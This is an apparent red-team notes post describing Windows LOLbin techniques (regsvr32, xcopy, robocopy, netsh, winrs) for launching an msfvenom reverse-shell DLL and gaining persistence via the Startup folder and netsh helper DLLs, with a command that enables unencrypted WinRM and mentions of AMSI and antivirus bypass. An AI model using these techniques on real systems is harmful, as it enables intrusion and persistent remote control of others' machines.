Some instances of LOLbins that i've looked at and found. On a fully patched windows 10 host connecting back to a Kali machine

First run this to bypass AMSI. THen work out which AV engine your target uses and bypass it using one of these.

Reverse Shell .dll

Using msfvenom to generate a .dll that calls a tcp reverse shell.


Contents of trix.bat, to run the previously generated .dll via regsvr32.exe .

Xcopy then copies this .bat file into the C:\Users\IEUser\Start Menu\Programs\Startup directory, when files are into this directory, they spawn on startup and execute for a given user

When the user then logs on, this .bat is executed, which then executes a .dll and a reverse shell is executed.


Robocopy then copies from a network share at \\\ropnop\roprobo , robocopy copies a directory, contained within that directory there is the trix.bat and trix.dll files

As can be seen, this then causes the reverse shell to execute


Netsh has a function that is possible to load, that isit can load 'helper' dll's, and it is able to load the previously generated msfvenom dll

Additionally it is possible to gain persistence on a machine, by running netsh.eve, which will then load the helper .dll whenever it is started


To allow winrs to be used, it is necessary to enable it, which is possible throug hthe following command - winrm quickconfig -quiet & winrm set winrm/config/Client @{AllowUnencrypted = "true"}

You can then use winrs to run commands via localhos, here I used a netcat executable, nc64.exe to get a reverse shell, however you could use regsvr32.exe or another lolbin to execute a command

References: Azeria's Persistence